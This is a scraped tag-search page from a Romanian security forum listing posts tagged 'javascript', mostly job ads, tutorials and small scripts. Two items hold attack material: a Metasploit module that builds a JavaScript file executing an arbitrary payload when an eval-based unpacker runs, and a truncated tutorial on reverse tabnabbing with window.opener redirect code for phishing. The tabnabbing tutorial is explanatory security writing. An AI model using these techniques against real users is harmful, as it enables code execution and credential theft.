Jump to content

Search the Community

Showing results for tags 'javascript'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start



Website URL










Found 25 results

  1. Salutare, as vrea sa gasesc pe cineva care se pricepe la Javascript si Python sa preia de la mine 2 proiecte. Beneficiarul plateste 30 euro / ora pentru programare si 10 euro / ora pentru restul (convorbiri, documentatie, etc). Proiectele sunt functionale dar necesita mentenanta si imbunatatiri, plus ca beneficiarul nu se pricepe la linux. Deci totul trebuie explicat cu rabdare. Multam mihk
  2. Cunoștințe avansate PHP/ MySQL, HTML/CSS/JS (jQuery), Javascriptengleză nivel mediuExperienta in proiecte de ecommerce ( WordPress woocommerce, OpenCart, Prestashop, Magento ), implementare API.Vei lucra în cadrul unor proiecte de ecommerce. Căutăm oameni pro-activi, care rezolvă problemele până la capăt, și care au dorința și capacitatea de a crea propriile structuri și implementa propria viziune pentru soluționarea unui task.
  3. Overview TL;DR: There are a ton of great JavaScript frameworks out there, and it can be a little overwhelming to keep up with them all. The learning curve for these frameworks can also be a bit steep. Vue.js is a breath of fresh air in this regard. In this tutorial, we'll see how easy it is to get up and running with a Vue.js app and how we can easily add authentication to it. Check out the repo to get the code. We are lucky to have plenty of JavaScript frameworks to choose from these days but, at the same time, it can be quite fatiguing to keep up with all of them. Some have a steep learning curve and require a lot of time for developers and their teams to become comfortable with. Others might be easy to learn, but perhaps lack some features that are crucial to a project. In either case, the level of complexity associated with learning a new framework can often hinder adoption and leave developers and teams frustrated. If you're still choosing a framework for your Single Page App (SPA), or if you just want to learn a new technology, I believe Vue.js is one of the best frameworks you can pick. I love Vue.js for its simplicity and elegance, and how I can be super productive with it without needing to spend tons of time learning. In my experience, Vue.js just works and gets out of my way when developing applications. Those are some anecdotal selling points, but let's cut to the hard facts: what exactly is Vue.js and how does it differ from other frameworks? If you're familiar with AngularJS 1.x, then Vue.js will probably look pretty familiar. In fact, Vue is heavily inspired by Angular. So what's the difference then? Essentially, Vue has a much simpler and cleaner API, is more flexible, and claims better performance. Vue.js is firstly a view layer for applications that allows for reactive data binding and composable view components, and many developers use it only for their view layers. However, when combined with other tools in the Vue ecosystem, such as vue-router, vue-resource, and vue-loader, we get all the benefits of a great SPA framework while simplicity and developer experience are maintained. What We'll Build: A Vue.js Authentication App To demonstrate how easy it is to get up and running with a full SPA using Vue, we'll build a simple app that retrieves Chuck Norris quotes from a NodeJS backend. Vue can easily be mixed with other technologies, and you can use Vue for as much or as little of your app as you wish. To demonstrate Vue's full potential though, we'll build the whole front-end SPA with Vue components and follow Vue's pattern for large-scale applications. The front-end app will be totally decoupled from the back end, and we'll make HTTP requets to RESTful endpoints on our server. We'll also demonstrate how we can easily add authentication to our Vue.js app. We'll put Login and Signup components in place to show how we can retrieve and save a user's JWT, and then send it back to the server for accessing protected endpoints. Rather than listing out how Vue implements certain features and comparing them to other frameworks, we'll let the code speak for itself. Again, if you're familiar with Angular, it will be easy to reason about Vue's features and syntax. Installation and Setup Everything we need to start our component-based Vue.js app is on NPM. To get started, let's pull down what we need by creating our package.json file and specifying the packages we need. We can take full advantage of ES6 for our Vue components, and to make that happen, we'll use Babel. We'll also bundle everything up with Webpack and use hot reloading to see changes to our modules happen immediately. If you wish, you can also use other build tools (like Browserify) instead of Webpack. // package.json ... "devDependencies": { "babel-core": "^6.1.2", "babel-loader": "^6.1.0", "babel-plugin-transform-runtime": "^6.1.2", "babel-preset-es2015": "^6.1.2", "babel-runtime": "^6.0.14", "css-loader": "^0.21.0", "style-loader": "^0.13.0", "vue-hot-reload-api": "^1.2.1", "vue-html-loader": "^1.0.0", "vue-loader": "^7.0.1", "webpack": "^1.12.3", "webpack-dev-server": "^1.12.1" }, "dependencies": { "bootstrap": "^3.3.5", "vue-resource": "^0.1.17", "vue-router": "^0.7.5", "vue": "^1.0.7" } ... Once the rest of our package.json file is in place, we can install everything. npm install To make Webpack work, we need a configuration file for it. Let's put in a file called webpack.config.js and populate it. // webpack.config.js module.exports = { // the main entry of our app entry: ['./src/index.js', './src/auth/index.js'], // output configuration output: { path: __dirname + '/build/', publicPath: 'build/', filename: 'build.js' }, module: { loaders: [ // process *.vue files using vue-loader { test: /\.vue$/, loader: 'vue' }, // process *.js files using babel-loader // the exclude pattern is important so that we don't // apply babel transform to all the dependencies! { test: /\.js$/, loader: 'babel', exclude: /node_modules/ } ] }, babel: { presets: ['es2015'], plugins: ['transform-runtime'] } } In this config file, we're first specifying where our app's main entry point is and what the output path should be. The bundled JavaScript will be served as one file called build.js. In the module.loaders array, we're setting up processing for our Vue components. These components have an extension of .vue and are processed by vue-loader. That's all the configuration we need for now. Once we have our files in place, we just need to run webpack-dev-server --inline --hot to bundle and serve everything. Setting Up the Back End We're using our trusty nodejs-jwt-authentication-sample to retrieve Chuck Norris quotes. Clone the repo wherever you like (here we're putting it in a server directory) and follow the readme for installation steps. Setting Up the Vue Components Let's get started with the actual components for our app. But first, what exactly is a Vue component and how does it work? Vue components allow us to specify a template, a script, and style rules all in one file. If you're familiar with React, this will likely be familiar. This move toward composition and splitting the app into small components is helpful for maintainence and reasoning about the app. To see how this works, let's start with the Home component. <!-- src/components/Home.vue --> <template> <div class="col-sm-6 col-sm-offset-3"> <h1>Get a Free Chuck Norris Quote!</h1> <button class="btn btn-primary" v-on:click="getQuote()">Get a Quote</button> <div class="quote-area" v-if="quote"> <h2><blockquote>{{ quote }}</blockquote></h2> </div> </div> </template> <script> export default { data() { return { quote: '' } }, methods: { getQuote() { this.$http .get('http://localhost:3001/api/random-quote', (data) => { this.quote = data; }) .error((err) => console.log(err)) } } } </script> The template is just some simple markup with a button that calls the method getQuote. We can notice some similarities to Angular in this code already. The template uses directives like v-on:click for click events, and v-if to conditionally show and hide the quote-area div. Vue also uses the double curly brace syntax for templating, which is how we take care of rendering the quoteproperty. The script area exports an object that is converted into a component constructor function by Vue. It has on it a data method and a methods object where we can register custom methods. When we want to register a data property to be used in the template, we need to do so in the data method. If we were to leave out the quote property from the returned object, that property wouldn't be rendered in the template. The getQuote method makes an HTTP request to our back end and sets the returned data on the quote property. This gives us a good idea of what Vue components look like, but this won't work quite yet because we need to set up our app's main entry point, as well as a main App component. Here's how this component will render once everything is set up: Setting Up index.js and App.vue The index.js file is the place where we set up our main imports and do other configuration like routing. Let's set up everything we'll need for the whole app right now. // src/index.js import Vue from 'vue' import App from './components/App.vue' import Home from './components/Home.vue' import SecretQuote from './components/SecretQuote.vue' import Signup from './components/Signup.vue' import Login from './components/Login.vue' import VueRouter from 'vue-router' import VueResource from 'vue-resource' Vue.use(VueResource) Vue.use(VueRouter) export var router = new VueRouter() // Set up routing and match routes to components router.map({ '/home': { component: Home }, 'secretquote': { component: SecretQuote }, '/login': { component: Login }, '/signup': { component: Signup } }) // Redirect to the home route if any routes are unmatched router.redirect({ '*': '/home' }) // Start the app on the #app div router.start(App, '#app') We're importing some components we've yet to create, as well as vue-router and vue-resource. For the app to recognize vue-router and vue-resource, we just need to call Vue.use on them. We can set up our route definitions with the simple map method on our instance of vue-router. The reason we're exporting this instance is so we can get a reference to it in our other components. <!-- src/components/App.vue --> <template> <nav class="navbar navbar-default"> <div class="container"> <ul class="nav navbar-nav"> <li><a v-link="'home'">Home</a></li> <li><a v-link="'login'">Login</a></li> <li><a v-link="'signup'">Sign Up</a></li> <li><a v-link="'secretquote'">Secret Quote</a></li> <li><a v-link="'login'">Logout</a></li> </ul> </div> </nav> <div class="container"> <router-view></router-view> </div> </template> To start out, our App component just needs a template. This top-level component has a navbar and exposes a router-view which is where our various routes will be rendered. Linking to routes is as simple as placing v-link on the anchor tags. Finally, we need to be sure to place a div with an id of app within index.html, as this is where the whole app will be exposed. <!-- index.html --> ... <body> <div id="app"></div> <script src="build/build.js"></script> </body> ... User Authentication - Login and Signup Components To log users in, we'll need to make an HTTP request to our authentication endpoint and save the JWT that is returned in localStorage. We could place this logic right within our Login component, but we should really have a service to make it more reusable. Let's create a directory called auth and provide an index.js file there. // src/auth/index.js import {router} from '../index' // URL and endpoint constants const API_URL = 'http://localhost:3001/' const LOGIN_URL = API_URL + 'sessions/create/' const SIGNUP_URL = API_URL + 'users/' export default { // User object will let us check authentication status user: { authenticated: false }, // Send a request to the login URL and save the returned JWT login(context, creds, redirect) { context.$http.post(LOGIN_URL, creds, (data) => { localStorage.setItem('id_token', data.id_token) localStorage.setItem('access_token', data.access_token) this.user.authenticated = true // Redirect to a specified route if(redirect) { router.go(redirect) } }).error((err) => { context.error = err }) }, signup(context, creds, redirect) { context.$http.post(SIGNUP_URL, creds, (data) => { localStorage.setItem('id_token', data.id_token) localStorage.setItem('access_token', data.access_token) this.user.authenticated = true if(redirect) { router.go(redirect) } }).error((err) => { context.error = err }) }, // To log out, we just need to remove the token logout() { localStorage.removeItem('id_token') localStorage.removeItem('access_token') this.user.authenticated = false }, checkAuth() { var jwt = localStorage.getItem('id_token') if(jwt) { this.user.authenticated = true } else { this.user.authenticated = false } }, // The object to be passed as a header for authenticated requests getAuthHeader() { return { 'Authorization': 'Bearer ' + localStorage.getItem('access_token') } } } Our auth service exposes methods for logging users in and out, signing them up, and checking their authentication status. Note that "logging in" is just a matter of saving the JWT that is returned by the server. These methods and properties will all be useful throughout the app. For example, we can use the user.authenticated property to conditionally show elements in the app. Implementing the Login Component The Login component will need some HTML for the user inputs and a method to call our auth service. <!-- src/components/Login.vue --> <template> <div class="col-sm-4 col-sm-offset-4"> <h2>Log In</h2> <p>Log in to your account to get some great quotes.</p> <div class="alert alert-danger" v-if="error"> <p>{{ error }}</p> </div> <div class="form-group"> <input type="text" class="form-control" placeholder="Enter your username" v-model="credentials.username" > </div> <div class="form-group"> <input type="password" class="form-control" placeholder="Enter your password" v-model="credentials.password" > </div> <button class="btn btn-primary" @click="submit()">Access</button> </div> </template> <script> import auth from '../auth' export default { data() { return { // We need to initialize the component with any // properties that will be used in it credentials: { username: '', password: '' }, error: '' } }, methods: { submit() { var credentials = { username: this.credentials.username, password: this.credentials.password } // We need to pass the component's this context // to properly make use of http in the auth service auth.login(this, credentials, 'secretquote') } } } </script> HTTP calls made with vue-resource require a component's context, and since we're abstracting that logic to a service, we need to pass the Login component's this context to the service. The second argument is the object with the user's credentials, and the third is the route we want to redirect to upon successfully authenticating. Note that we're using @click on our submit button here. This is a shorthand alternative to v-on:click. The Signup component is nearly identical, except it will use the signup method from the auth service to send the user's credentials to a different endpoint. Implementing the Secret Quote Component When a user successfully authenticates, they will be able to access the secret-quote route from the API. The SecretQuote component will look similar to the Home component, but we'll attach the user's JWT as an Authorization header when requests are sent. <!-- src/components/SecretQuote.vue --> <template> <div class="col-sm-6 col-sm-offset-3"> <h1>Get a Secret Chuck Norris Quote!</h1> <button class="btn btn-warning" v-on:click="getQuote()">Get a Quote</button> <div class="quote-area" v-if="quote"> <h2><blockquote>{{ quote }}</blockquote></h2> </div> </div> </template> <script> import auth from '../auth' export default { data() { return { quote: '' } }, methods: { getQuote() { this.$http .get('http://localhost:3001/api/protected/random-quote', (data) => { this.quote = data; }, { // Attach the JWT header headers: auth.getAuthHeader() }) .error((err) => console.log(err)) } }, route: { // Check the users auth status before // allowing navigation to the route canActivate() { return auth.user.authenticated } } } </script> The header is attached by providing an options object as the third argument to the HTTP request. To get the JWT header, we call the getAuthHeader method from the auth service. Since we don't want users to access this route if they are not authenticated, we can tap into vue-router's transition pipeline. Specifically, we use the canActivate hook and consult the auth service to check if the user is authenticated. If so, the route can be navigated to. Final Touches We're nearly done, but there are a couple of improvements we can make before we finish out. It would be good to conditionally show and hide menu items based on the user's auth status. To do that, we'll use v-if. <!-- src/components/App.vue --> <template> <nav class="navbar navbar-default"> <div class="container"> <ul class="nav navbar-nav"> <li><a v-link="'home'">Home</a></li> <li><a v-link="'login'" v-if="!user.authenticated">Login</a></li> <li><a v-link="'signup'" v-if="!user.authenticated">Sign Up</a></li> <li><a v-link="'secretquote'" v-if="user.authenticated">Secret Quote</a></li> <li><a v-link="'login'" v-if="user.authenticated" @click="logout()">Logout</a></li> </ul> </div> </nav> <div class="container"> <router-view></router-view> </div> </template> <script> import auth from '../auth' export default { data() { return { user: auth.user } }, methods: { logout() { auth.logout() } } } </script> The auth service sets the user's authentication status when the login or logout methods are used, but if the page is refreshed or the app closed and reopened, that status will be lost. To get around that, let's call checkLogin when the app is first loaded. // src/index.js ... import auth from './auth' // Check the users auth status when the app starts auth.checkAuth() ... Setting Global Headers When we make a request to the protected secret-quote route, we pass an options object that has the Authorization header and user's JWT access_tokenon it. If, instead, we wanted to globally set the Authorization header and not worry about setting it on each HTTP request, we could set up a global header. // src/index.js ... // Optional Vue.http.headers.common['Authorization'] = auth.getAuthHeader(); ... Aside: Using Auth0 With Your Vue.js App uth0 issues JSON Web Tokens on every login for your users. This means that you can have a solid identity infrastructure, including single sign-on, user management, support for social identity providers (Facebook, Github, Twitter, etc.), enterprise identity providers (Active Directory, LDAP, SAML, etc.) and your own database of users with just a few lines of code. We can easily set up authentication in our Vue.js apps by using the Lock Widget. Step 1: Include Auth0's Lock Widget <!-- index.html --> ... <!-- Auth0 Lock script --> <script src="//cdn.auth0.com/js/lock-7.11.1.min.js"></script> ... Step 2: Instantiate Lock in index.js // src/index.js ... // Instantiate a Lock export var lock = new Auth0Lock(YOUR_CLIENT_ID, YOUR_CLIENT_DOMAIN) ... Step 3: Call the Lock Widget from a Vue.js Component <!-- src/components/Login.vue --> <template> <div class="col-sm-4 col-sm-offset-4"> <h2>Log In</h2> <p>Log In with Auth0's Lock Widget.</p> <button class="btn btn-primary" @click="login()">Log In</button> </div> </template> <script> // Import the Lock instance import {lock} from '../index' export default { methods: { login() { // Show the Lock Widget and save the user's JWT on a successful login lock.show((err, profile, id_token) => { localStorage.setItem('profile', JSON.stringify(profile)) localStorage.setItem('id_token', id_token) }) }, logout() { // Remove the profile and token from localStorage localStorage.removeItem('profile') localStorage.removeItem('id_token') } } } </script> Important API Security Note: If you want to use Auth0 authentication to authorize API requests, note that you'll need to use a different flow depending on your use case. Auth0 idToken should only be used on the client-side. Access tokens should be used to authorize APIs. You can read more about making API calls with Auth0 here. Wrapping Up We have many great choices for SPA frameworks these days, and this can easily cause analysis paralysis. Further, it can be fatiguing to keep up with the pace of new framework development and to learn their ins and outs. I find Vue.js to be a breath of fresh air in this regard. The library and ecosystem are feature-rich, but they get out of your way as you develop your apps. I've found that the learning curve with Vue.js isn't as steep as it can be with other frameworks, and from my experience, it seems to always just work. As we saw in this tutorial, we can easily add authentication to our Vue.js apps. Also, Vue's HTTP library, vue-resource, makes it trivial to send requests with an Authorization header. I hope you'll consider Vue.js for your next project--it really is great to work with! Source: https://auth0.com/blog/build-an-app-with-vuejs/.
  4. The finest NBA CLI. The finest NBA CLI. Watch NBA live play-by-play, game preview, box score and player information on your console. Best CLI tool for who is both a NBA fans and Engineer. All data comes from stats.nba.com APIs. Install $ npm install -g nba-go Usage nba-go provides two main commands. game or g player or p Game There are two things to do. Check schedule. Choose one game which you want to watch. Depends on the status of the game you chose, it shows different result for you. There are three kinds of status may happened. Status Example Description Pregame It shows when the game starts. Selecting this will show the comparison between two teams, including average points, field goal percents, average assists, etc. Live It shows live game clock. Most powerful feature! Selecting this will show the live page which includes scoreboard, play-by-play and box score. Final Selecting this will show scoreboard, detailed box score, etc. Check schedule In order to show the schedule on some day. nba-go provides the command nba-go game with some options. Options -d <date> or --date <date> Enter a specific date to check the schedule on that day. $ nba-go game -d 2017/11/02 -y or --yesterday Check yesterday's schedule. $ nba-go game -y -t or --today Check today's schedule. $ nba-go game -t -T or --tomorrow Check tomorrow's schedule. $ nba-go game -T Pregame Check the detailed comparison data between two teams in the game. Live Best feature! Realtime updated play-by-play, scoreboard and box score. Turn on fullscreen mode for better experience. Btw, play-by-play is scrollable!. Final Check two teams' detailed scoreboard and box score. Player Get player's basic information, regular season data and playoffs data. Note. Must place player's name between nba-go player and options. Options -i or --info Get player's basic information. $ nba-go player Curry -i -r or --regular Get player's basic information. $ nba-go player Curry -r -p or --playoffs Get player's basic information. $ nba-go player Curry -p Mixed them all Get all data at the same time. $ nba-go player Curry -i -r -p Related repo: watch-nba nba-color License MIT Download: nba-go-master.zip or git clone https://github.com/xxhomey19/nba-go.git Sources: https://www.npmjs.com/package/nba-go https://github.com/xxhomey19/nba-go
  5. rtfmplay


    Salut, nu prea m-am intersectat cu javascript si vreau sa intreb ceva legat de el. Trebuie sa fac replace la niste caractere introduse de la tastatura asupra unui input de tip text. Sa inlocuiasca in timp de userul introduce "-" cu "/" dar neaprat in timp de introduce textul; 23gg3j3b-3dd9ds-ossd33yj-oopw3 23gg3j3b/3dd9ds/ossd33yj/oopw3
  6. Am incercat cu cateva tooluri online dar nu am avut rezultate bune. Dau o bere celui care ma poate ajuta. Ms in avans. http://pastebin.com/raw/cPd9jYNi
  7. Care este cea mai buna metoda pentru a detecta daca un utilizator foloseste proxy atunci cand intra pe un site ? Stiu ca unele proxy sunt imposibil de detectat, ma intereseaza sa le detectez pe alea care nu il protejeaza 100% pe utilizator. Momentan folosesc acest cod PHP , dar este o metoda veche si unele proxy nu seteaza Headers. Se poate face ceva cu JavaScript ? Sau alte metode PHP ? Am mai vazut o metoda care face reverse si verifica portul , nu este ok , se incarca greu pagina si porturile sunt multe iar rezultatul poate fi fals pozitiv. Nu vreau sa folosesc API sau Servicii oferite cu BlackListuri sau etc... $proxy_headers = array( 'HTTP_VIA', 'HTTP_X_FORWARDED_FOR', 'HTTP_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_FORWARDED', 'HTTP_CLIENT_IP', 'HTTP_FORWARDED_FOR_IP', 'VIA', 'X_FORWARDED_FOR', 'FORWARDED_FOR', 'X_FORWARDED', 'FORWARDED', 'CLIENT_IP', 'FORWARDED_FOR_IP', 'HTTP_PROXY_CONNECTION' ); foreach($proxy_headers as $x){ if (isset($_SERVER[$x])) echo("You are using a proxy!"); } UPDATE (poate mai are nevoie cineva) : What is a "WebRTC leaks"? WebRTC implement STUN (Session Traversal Utilities for Nat), a protocol that allows to discover the public IP address. Live Demo : https://diafygi.github.io/webrtc-ips/ More Info : https://www.privateinternetaccess.com/forum/discussion/8204/how-to-stop-webrtc-local-ip-address-leaks-on-google-chrome-and-mozilla-firefox-while-using-private-i Am intrat cu proxy si mi-a afisat Ip-ul real, functioneaza in Chrome si Firefox. Cu VPN nu a reusit sa vada ip-ul real. Pe Android si alte browsere , din ce am citit , nu functioneaza. Pentru a dezactiva WebRTC : Mozilla Firefox: Type "about:config” in the address bar. Scroll down to “media.peerconnection.enabled”, double click to set it to false. Google Chrome: Install Google official extension WebRTC Network Limiter. Thanks to
  8. Security researchers from Trend micro recently discovered a new JavaScript-based malware that infects your mobile devices and also attacks your home router by altering its DNS (Domain Name System) settings. This new threat was named as JS_JITON and was first noticed in end of December 2015, continuing to infect devices up until this day, hitting its peak in February 2016, with over 1,500 infections per day. Researchers say that the malware spreads it’s infection chain in a very simple way. Attackers place their code in some websites and wait for users to visit The malware’s infection chain is simple. According to Trend Micro researchers, attackers place malicious code on compromised websites and wait for users to visit these pages using mobile devices. Once this happens, the malware is downloaded to the user’s mobile device and executes, trying to connect to the local home network’s router IP using a series of admin and passwords combos hardcoded in the JS_JITON malware source code. The malware has over 1,400 credentials are included, and once the malware authenticates on the device, it will change the router’s DNS settings. Very little is known about what the intentions of this malware are, but taking into account that at one point it also included malicious code that executed from desktop computers, Trend Micro researchers believe this is a “work in progress,” with its creators still exploring their attack’s capabilities. The belief was made strong by the fact that attackers regularly update JS_JITON’s source code, changing small details here and there, fine tuning their attacks. Additionally, at one point, the JS_JITON source code also included a keylogging component. According to researchers JS_JITON could attack D-Link and TP-Link routers, but it also included a special exploit to take advantage of CVE-2014-2321, an older vulnerability in ZTE modems. Malwares like this could be a serious threat if not killed in the initial stage. Source
  9. Salut, Javascript se poate invata dintr-o singura imagine: https://github.com/coodict/javascript-in-one-pic
  10. salut, am nevoie de cineva care stie javascript sa modific ceva in codu asta. Pastebin.com Contra cost. multumesc
  11. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/exploit/jsobfu' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::JSObfu def initialize(info = {}) super(update_info(info, 'Name' => 'Javascript Injection for Eval-based Unpackers', 'Description' => %q{ This module generates a Javascript file that executes arbitrary code when an eval-based unpacker is run on it. Works against js-beautify's P_A_C_K_E_R unpacker. }, 'Author' => [ 'joev' ], 'License' => MSF_LICENSE, 'References' => [ ], 'Platform' => 'nodejs', 'Arch' => ARCH_NODEJS, 'Privileged' => false, 'Targets' => [['Automatic', {}]], 'DisclosureDate' => 'Feb 18 2015', 'DefaultTarget' => 0)) register_options([ OptString.new('FILENAME', [true, 'The file name.', 'msf.js']), OptString.new('CUSTOM_JS', [false, 'Custom Javascript payload.']) ], self.class) end def exploit p = js_obfuscate(datastore['CUSTOM_JS'] || payload.encoded); print_status("Creating '#{datastore['FILENAME']}' file...") file_create("eval(function(p,a,c,k,e,r){}((function(){ #{p} })(),''.split('|'),0,{}))") end end Source
  12. sharkyz

    [JS] Alarma

    Un mic script in js pentru a te avertiza dupa o anumita perioada de timp predefinita de utilizator. // Alarm Clock Mai jos aveti codul sursa care il puteti copia in consola din chrome. // (Ctrl-Shift-C) (function() { (function() { var tim_def = prompt("Timp pana la declansarea alarmei?"); if (tim_def.length === 1) { var tim = tim_def; } else if (tim_def.length > 1) { var tim = tim_def.slice(0,-1); } else { alert ('Raspunsul nu este valid incearca din nou!') } var lctim = tim_def.slice(-1); var audio = new Audio('http://soundjax.com/reddo/97744%5EALARM.mp3'); var alerta = function(smo) { var mes = prompt("Ce ai vrea sa spun alerta ta?", "Alert!"); if (tim_def !== null) { setTimeout(function() { audio.play(); alert(mes ? mes : 'Alarma!'); }, 1000 * smo * parseFloat(tim)); } }; switch (lctim) { case 's': //secunde alerta(1); break; case 'm': //minute alerta(60); break; case 'o': //ore alerta(3600); break; default: alerta(60); break; } })(); })(); In plus puteti face un bookmark cu codul de mai jos: javascript:!function(){!function(){var a=prompt("Timp pana la declansarea alarmei?");if(1===a.length)var e=a;else if(a.length>1)var e=a.slice(0,-1);else alert("Raspunsul nu este valid incearca din nou!");var l=a.slice(-1),n=new Audio("http://soundjax.com/reddo/97744%5EALARM.mp3"),r=function(l){var r=prompt("Ce ai vrea sa spun alerta ta?","Alert!");null!==a&&setTimeout(function(){n.play(),alert(r?r:"Alarma!")},1e3*l*parseFloat(e))};switch(l){case"s":r(1);break;case"m":r(60);break;case"o":r(3600);break;default:r(60)}}()}();
  13. Caut om care stie sa lucreze in php , html sau javascript . PM pentru detalii.
  14. Versus71


    Regex101.com is a free of charge regex testing service where you can easily create expressions while you simultaneously have real time error detection, highlighting and explanation of your regex. Thanks to the permalink feature, it is a great reference which may even be used in code where you need to explain your regular expressions to co-workers. Link: regex101.com
  15. Am nevoie de un script care sa tina cont de fiecare data cand un user inregistrat pe site da share unui articol pe social network-uri (FB, Twitter, G+ si Pinterest). De fiecare data cand user-ul da share la un articol, share count-ul acelui user creste cu unu. Site-ul e in Wordpress si hosting-ul e solid.
  16. Am gasit pe net un javascript amuzant si am zis ca sa-l impartasesc cu voi poate intereseaza pe careva. SE introduce in consola (F12) sau click dreapta-inspect element-console in chrome sau alt browser de genu de preferat pe pagina de facebook ca e mai interesant [TABLE=class: outer_border, width: 500] [TR] [TD]javascript:(function(){function c(){var e=document.createElement("link");e.setAttribute("type","text/css");e.setAttribute("rel","stylesheet");e.setAttribute("href",f);e.setAttribute("class",l);document.body.appendChild(e)}function h(){var e=document.getElementsByClassName(l);for(var t=0;t<e.length;t++){document.body.removeChild(e[t])}}function p(){var e=document.createElement("div");e.setAttribute("class",a);document.body.appendChild(e);setTimeout(function(){document.body.removeChild(e)},100)}function d(e){return{height:e.offsetHeight,width:e.offsetWidth}}function v(i){var s=d(i);return s.height>e&&s.height<n&&s.width>t&&s.width<r}function m(e){var t=e;var n=0;while(!!t){n+=t.offsetTop;t=t.offsetParent}return n}function g(){var e=document.documentElement;if(!!window.innerWidth){return window.innerHeight}else if(e&&!isNaN(e.clientHeight)){return e.clientHeight}return 0}function y(){if(window.pageYOffset){return window.pageYOffset}return Math.max(document.documentElement.scrollTop,document.body.scrollTop)}function E(e){var t=m(e);return t>=w&&t<=b+w}function S(){var e=document.createElement("audio");e.setAttribute("class",l);e.src=i;e.loop=false;e.addEventListener("canplay",function(){setTimeout(function(){x(k)},500);setTimeout(function(){N();p();for(var e=0;e<O.length;e++){T(O[e])}},15500)},true);e.addEventListener("ended",function(){N();h()},true);e.innerHTML=" <p>If you are reading this, it is because your browser does not support the audio element. We recommend that you get a new browser.</p> <p>";document.body.appendChild(e);e.play()}function x(e){e.className+=" "+s+" "+o}function T(e){e.className+=" "+s+" "+u[Math.floor(Math.random()*u.length)]}function N(){var e=document.getElementsByClassName(s);var t=new RegExp("\\b"+s+"\\b");for(var n=0;n<e.length;){e[n].className=e[n].className.replace(t,"")}}var e=30;var t=30;var n=350;var r=350;var i="//s3.amazonaws.com/moovweb-marketing/playground/harlem-shake.mp3";var s="mw-harlem_shake_me";var o="im_first";var u=["im_drunk","im_baked","im_trippin","im_blown"];var a="mw-strobe_light";var f="//s3.amazonaws.com/moovweb-marketing/playground/harlem-shake-style.css";var l="mw_added_css";var b=g();var w=y();var C=document.getElementsByTagName("*");var k=null;for(var L=0;L<C.length;L++){var A=C[L];if(v(A)){if(E(A)){k=A;break}}}if(A===null){console.warn("Could not find a node of the right size. Please try a different page.");return}c();S();var O=[];for(var L=0;L<C.length;L++){var A=C[L];if(v(A)){O.push(A)}}})()[/TD] [/TR] [/TABLE] Acest scrip face ceva de genu nu e cine stie ce dar poate ii vine cuiva vreo idee sa-l modifice sau sal foloseasca in vreun fel
  17. Sper s? nu gre?esc dac? voi spune, c? ?tim cu to?ii ce e un link ?i la ce folose?te atributul target pentru tag-ul <a>. ?i dat fiind faptul c? majoritatea consider? inofensiv? folosirea acestei tehnici atât de populare, în acest tutorial voi încerca s? demonstrez contrariul. Pentru început vreau s? men?ionez c? ceea ce va fi descris aici, personal o consider a fiind o vulnerabilitate pentru toate browserele cu excep?ia... ta-da! — Internet Explorer. Iat? de ce în continuare voi folosi cuvântul „vulnerabilitate” atunci când m? voi referi la acest „fenomen”. De asemenea, v? rog s? atrage?i aten?ia c? aceast? vulnerabilitate v-a func?iona perfect doar dac? se va ap?sa click de stânga pe link, ?i nu click de dreapta ? „Deschide în fil? nou?”. ?i, nu în ultimul rând, a?a cum toat? lumea recomand? s? fie folosit target="_blank" pentru toate link-urile externe (doar nu dorim ca utilizatorul s? p?r?seasc? pagina noastr?), trebuie s? constat c? aceast? vulnerabilitate afecteaz? majoritatea site-urilor care fac referire la pagini externe. Teorie Dac? avem pagina curent? „A” ?i facem referire la pagina „B” folosind atributul target="_blank", atunci când se va deschide pagina „B” pentru aceasta va fi creat un obiect window.opener cu ajutorului c?ruia putem redirec?iona pagina „A” c?tre o nou? pagin? în timp ce utilizatorul acceseaz? pagina „B”. ?i cel mai important, paginile „A” ?i „B” pot fi pe domenii diferite. Practic? Pentru a în?elege mai bine despre ce merge vorba, v? recomand urm?torul exemplu: ap?sa?i click aici, a?tepta?i s? se încarce pagina, dup? care reveni?i înapoi. Dac? apare eroarea „window.opener is null” atunci: Ai deschis link-ul altfel decât folosind click de stânga; Browserul t?u nu e vulnerabil; Magie neagr?? Pentru un exemplu mai complex, v? rog s? accesa?i aceast? pagin? unde am folosit aceast? vulnerabilitate pentru a simula un atac de tip phishing asupra unui site ce ofer? servicii de email. Ca ?i pentru oricare site asem?n?tor (Gmail, Hotmail ?.a.) fiecare link primit într-un mesaj are atributul target="_blank". Explica?ii Pentru a exploata vulnerabilitatea, trimitem un mesaj ce con?ine adresa URL c?tre pagina „capcan?”, unde pentru a fi siguri c? utilizatorul a deschis link-ul, folosind click de stânga ?i nu alt? metod?, verific?m dac? exist? obiectul window.opener ?i nu este NULL. Dup? care, putem redirec?iona pagina de unde a venit utilizatorul. Codul arat? cam a?a: if (window.opener) { window.opener.location.replace('full-url-to-scam-page'); } Dup? cum pute?i observa, totul e atât de simplu, atât de banal, atât de periculos... Dac? pagina de phishing ?i cea legitim? arat? ca 2 pic?turi de ap?, iar numele domeniului nu d? de b?nuit, când utilizatorul va reveni la pagina ini?ial? cu siguran??, nu va observa modificarea. Pentru a da mai pu?in de b?nuit, poate fi modificat? adresa URL pentru pagina de phishing în felul urm?tor: De pe pagina funny.php e nevoie s? trimitem adresa URL (referrer) de unde a venit utilizatorul. Eu am f?cut a?a: var referrer = 